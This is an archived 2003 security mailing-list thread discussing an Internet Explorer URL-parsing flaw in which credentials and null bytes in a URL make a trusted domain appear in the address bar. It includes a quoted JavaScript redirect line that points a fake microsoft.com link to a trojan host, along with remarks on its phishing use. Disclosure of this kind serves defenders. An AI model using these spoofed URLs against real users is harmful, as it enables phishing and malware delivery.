Firebird also re-directs but at least you can see the full address in the title bar.
Tom Tonneson -----Original Message----- From: Rainer Gerhards [mailto:[EMAIL PROTECTED] Sent: 10 December 2003 15:06 To: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability Just to add http://www.microsoft.com:[EMAIL PROTECTED]/ works equally well with Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20030225 under Red Hat Linux 9. So it is not just an IE issue... Opera at least displays a decent warning and also replaces the password part of the credentials in visible display. Rainer On Wed, 2003-12-10 at 13:53, Rainer Gerhards wrote: > Well, 0x00 works even better (as usual). Consider the following URL: > > http://www.microsoft.com:[EMAIL PROTECTED] > > This, together with a little social engineering can do much. In my IE > 6.0.2800.1106.xpsp2.03422-1633 this takes your to www.linux.org, which > is also shown in the address bar. The status bar will show > "www.microsoft.com:security" whenever you hover over relative links on > the site (check with the news). The trick will most probably work will > with fake sites that remove the address bar. > > The 0x00 C string terminator causes often quite some troubles. I > remember reporting a similar problem to Microsoft some month ago, then > related to %00 not being correctly parsed by IIS. It was considered > low > risk by Microsoft and not immediately addressed (I have to admit I > actually think this at least not very high risk...). It should be > addressed by now. > > Back to the dicsussed topic: I think it is also not very clever to > display credentials in the status bar. So if somebody is dumb enough > to > actually use URLs with credentials, I think the browser should remove > them in all visible elements. > > Rainer Gerhards > Adiscon > > > > > > > ________________________________ > > From: VeNoMouS [mailto:[EMAIL PROTECTED] > Sent: Wednesday, December 10, 2003 6:03 AM > To: Julian HO Thean Swee; [EMAIL PROTECTED] > Subject: Re: [Full-Disclosure] RE: FWD: Internet Explorer URL > parsing vulnerability > > > umm tested this you dont need %01 either btw. > > [EMAIL PROTECTED] > > was messing around with some hex stile as well is there a way > to > call a file:// inside a http:// becos the issue with doing the @ trick > is it appends http:// automaticly, mind you , u could just make it > exec > some vb code or something on a site, just a random idea any way > > and it dont also seem to work if you use hex as well for the > full domain ie > > www.microsoft.com%40%77%77%77%2E%6C%69%6E%75%78%2E%6F%72%67 > > nor www.microsoft.com%40www.linux.org > > where as if you > [EMAIL PROTECTED] works > > > > > > > ----- Original Message ----- > > From: Julian HO Thean Swee <mailto:[EMAIL PROTECTED]> > To: '[EMAIL PROTECTED]' > Sent: Wednesday, December 10, 2003 4:22 PM > Subject: [Full-Disclosure] RE: FWD: Internet Explorer > URL parsing vulnerability > > > Hmm, it doesn't seem to work on my browser :) > I don't even get transported to any page when i click > the button. > But then again, i have everything turned off in the > internet zone by default... > (but my submit non-encrypted form data is on) > > Does it really work then? it looks like it's using > javascript...? (location.href) > Merry Christmas everyone :) > > --__--__-- > > Message: 1 > Date: Tue, 9 Dec 2003 10:22:59 -0800 (PST) > From: S G Masood <[EMAIL PROTECTED]> > To: [EMAIL PROTECTED] > Subject: [Full-Disclosure] RE: FWD: Internet > Explorer URL parsing vulnerability > > > LOL. This is so simple and dangerous, it > almost > made > me laugh and cry at the same time. Most of you > will > realise why...;D > The Paypal, AOL, Visa, Mastercard, et al email > scammers will have a harvest of gold this > month > with > lots of zombies falling for this simple > technique. > > ># POC ########## > > >http://www.zapthedingbat.com/security/ex01/vun1.htm > > Dont be surprised if your latest download from > http://www.microsoft.com turns out to be a > trojan! > > > location.href=unescape('http://[EMAIL PROTECTED] > adaneviltrojanfromme.com); > > > -- > S.G.Masood > > Hyderabad, > India > > PS: One more thing - no scripting required to > exploit this. > > __________________________________ > Do you Yahoo!? > Free Pop-Up Blocker - Get it now > http://companion.yahoo.com/ > > > This email is confidential and privileged. If you are > not the intended recipient, you must not view, disseminate, use or > copy > this email. Kindly notify the sender immediately, and delete this > email > from your system. Thank you. > > Please visit our website at www.starhub.com > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
